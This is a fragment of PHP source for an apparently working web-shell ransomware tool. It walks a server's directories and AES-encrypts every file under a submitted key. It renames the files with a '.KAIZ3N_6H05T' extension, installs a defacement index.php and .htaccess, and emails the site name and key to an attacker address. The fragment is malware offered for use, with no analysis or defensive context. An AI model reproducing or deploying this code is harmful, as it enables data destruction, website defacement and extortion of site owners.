.htaccess [DEFAULT PAGE]
';
}
if(file_put_contents("index.php", base64_decode("SCRIPT DEFACE"))){
echo '
index.php [DEFAULT PAGE]
';
}
}
}
public function shcpackUnstall(){
if( file_exists(".htalol") ){
if( unlink(".htaccess") && unlink("index.php") ){
echo '
.htaccess [DEFAULT PAGE]
';
echo '
index.php [DEFAULT PAGE]
';
}
rename(".htalol", ".htaccess");
}
}
public function plus(){
flush();
ob_flush();
}
public function locate(){
return getcwd();
}
public function shcdirs($dir,$method,$key){
switch ($method) {
case '1':
deRanSomeware::shcpackInstall();
break;
case '2':
deRanSomeware::shcpackUnstall();
break;
}
foreach(scandir($dir) as $d)
{
if($d!='.' && $d!='..')
{
$locate = $dir.DIRECTORY_SEPARATOR.$d;
if(!is_dir($locate)){
if( deRanSomeware::kecuali($locate,"ransmini.php") && deRanSomeware::kecuali($locate,".pnjg") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,"indehx.php") && deRanSomeware::kecuali($locate,".htalol") ){
switch ($method) {
case '1':
deRanSomeware::shcEnCry($key,$locate);
deRanSomeware::shcEnDesDirS($locate,"1");
break;
case '2':
deRanSomeware::shcDeCry($key,$locate);
deRanSomeware::shcEnDesDirS($locate,"2");
break;
}
}
}else{
deRanSomeware::shcdirs($locate,$method,$key);
}
}
deRanSomeware::plus();
}
deRanSomeware::report($key);
}
public function report($key){
$message.= "========= R4NSOMWAR3 MINI 5H3LL =========\n";
$message.= "WEBSITE : ".$_SERVER['HTTP_HOST'];
$message.= "KEY : ".$key;
$message.= "========= RANSOMWARE MINI LOGGER =========\n";
$subject = "REPORT RANSOMWARE";
$headers = "FROM: GHOST
\r\n";
mail("blackcodersanonymous@gmail.com",$subject,$message,$headers);
}
public function shcEnDesDirS($locate,$method){
switch ($method) {
case '1':
rename($locate, $locate.".KAIZ3N_6H05T");
break;
case '2':
$locates = str_replace(".KAIZ3N_6H05T", "", $locate);
rename($locate, $locates);
break;
}
}
public function shcEnCry($key,$locate){
$data = file_get_contents($locate);
$iv = mcrypt_create_iv(
mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
MCRYPT_DEV_URANDOM
);
$encrypted = base64_encode(
$iv .
mcrypt_encrypt(
MCRYPT_RIJNDAEL_128,
hash('sha256', $key, true),
$data,
MCRYPT_MODE_CBC,
$iv
)
);
if(file_put_contents($locate, $encrypted )){
echo ' ENCRYPTED [SUCCESS] | '.$locate.'
';
}else{
echo ' ENCRYPTED [FAILED] | '.$locate.'
';
}
}
public function shcDeCry($key,$locate){
$data = base64_decode( file_get_contents($locate) );
$iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$decrypted = rtrim(
mcrypt_decrypt(
MCRYPT_RIJNDAEL_128,
hash('sha256', $key, true),
substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
MCRYPT_MODE_CBC,
$iv
),
"\0"
);
if(file_put_contents($locate, $decrypted )){
echo ' DECRYPTED [SUCCESS] | '.$locate.'
';
}else{
echo ' DECRYPTED [FAILED] | '.$locate.'
';
}
}
public function kecuali($ext,$name){
$re = "/({$name})/";
preg_match($re, $ext, $matches);
if($matches[1]){
return false;
}
return true;
}
}
if($_POST['submit']){
switch ($_POST['method']) {
case '1':
deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']);
break;
case '2':
deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']);
break;
}
}else{
?>